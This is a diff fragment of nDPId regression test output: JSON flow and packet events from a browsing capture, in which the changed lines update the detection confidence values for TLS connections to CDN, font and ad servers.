+01317{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9166,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605291690405,"flow_last_seen":1605291690502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":5957,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1605291690502,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","server_names":"aax-eu.amazon-adsystem.com,aax.amazon-adsystem.com,aax-cpm.amazon-adsystem.com,aax-dtb-web.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"49b45fc1ab090aa3a159778313fc9b9e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Amazon, OU=Server CA 1B, CN=Amazon","subjectDN":"CN=aax-eu.amazon-adsystem.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"5D:18:8E:CB:B7:91:5C:79:26:B5:08:49:FF:2C:24:D8:06:54:91:8B"}} 00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gDDgdACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttYBu\/eX0dQAAAAAoAL9IKwyAAACBAWgBAIIChrDFp8AAAAAAQMDBw=="} 00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9280,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -334,116 +334,116 @@ 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9288,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gCQMiACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGoBuxhoCyUAAAAAoAL9ILYPAAACBAWgBAIICriVOzQAAAAAAQMDBw=="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9293,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1605291690952,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690952,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu21pGefV\/3l9HVoBJXgDRiAAACBAV4AQMDAwQCCArC10u2GsMWnw=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9294,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1605291690952,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690952,"pkt":"qtsDr8lk5EKm5WPyht1gDDgdACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttYBu\/eX0dWRnn1ggBAB+7hZAAABAQgKGsMWucLXS7Y="} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9298,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690953,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690953,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9298,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690953,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690953,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9300,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1605291690954,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690954,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu22KVwltPCUkXloBJXgMhIAAACBAV4AQMDAwQCCArC10u9GsMWnw=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9301,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1605291690954,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690954,"pkt":"qtsDr8lk5EKm5WPyht1gDtx5ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttgBu8JSReWlcJbUgBAB+0w+AAABAQgKGsMWu8LXS70="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9302,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1605291690954,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690954,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu22it1t9ZMt7NvoBJXgClQAAACBAV4AQMDAwQCCArC10u9GsMWnw=="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9303,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1605291690954,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690954,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu23LTmo6vQxszqoBJXgBZ9AAACBAV4AQMDAwQCCArC10u9GsMWnw=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9304,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1605291690954,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690954,"pkt":"qtsDr8lk5EKm5WPyht1gDhnPACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttoBu0y3s28rdbfXgBAB+61FAAABAQgKGsMWu8LXS70="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9305,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1605291690954,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690954,"pkt":"qtsDr8lk5EKm5WPyht1gAc2lACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttwBu9DGzOq05qOsgBAB+5pyAAABAQgKGsMWu8LXS70="} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9306,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690954,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690954,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9307,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690954,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690954,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9308,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9306,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690954,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690954,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9307,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690954,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690954,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9308,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9309,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1605291690955,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690955,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu23lfa6eczuyRVoBJXgHLsAAACBAV4AQMDAwQCCArC10u9GsMWnw=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9310,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1605291690955,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690955,"pkt":"qtsDr8lk5EKm5WPyht1gClWEACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABtt4BuzO7JFVX2unogBAB+\/bgAAABAQgKGsMWvMLXS70="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9311,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1605291690955,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690955,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgRAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbuVFgHH2llkCsoHoBJXgJ6iAAACBAV4AQMDAwQCCArC10u9qlQMrQ=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9312,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1605291690955,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690955,"pkt":"qtsDr8lk5EKm5WPyht1gBhSQACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIEQAAAAAAACAKlRYBu2QKygcBx9pagBAB+yKXAAABAQgKqlQMysLXS70="} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9313,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9314,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9313,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9314,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9315,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1605291690956,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690956,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQZEy\/C8or4r7coBJXgC2BAAACBAV4AQMDAwQCCArC10u+uJU7NA=="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9316,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1605291690956,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690956,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQZgWfUkJjbNefoBJXgN3ZAAACBAV4AQMDAwQCCArC10u+uJU7NA=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9317,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1605291690956,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690956,"pkt":"qtsDr8lk5EKm5WPyht1gBnVWACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGQBuyvivtxMvwvLgBAB+7F0AAABAQgKuJU7UsLXS74="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9318,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1605291690956,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690956,"pkt":"qtsDr8lk5EKm5WPyht1gDhWZACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGYBu2Ns158Fn1JDgBAB+2HNAAABAQgKuJU7UsLXS74="} -00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9319,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690956,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690956,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9320,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690956,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690956,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 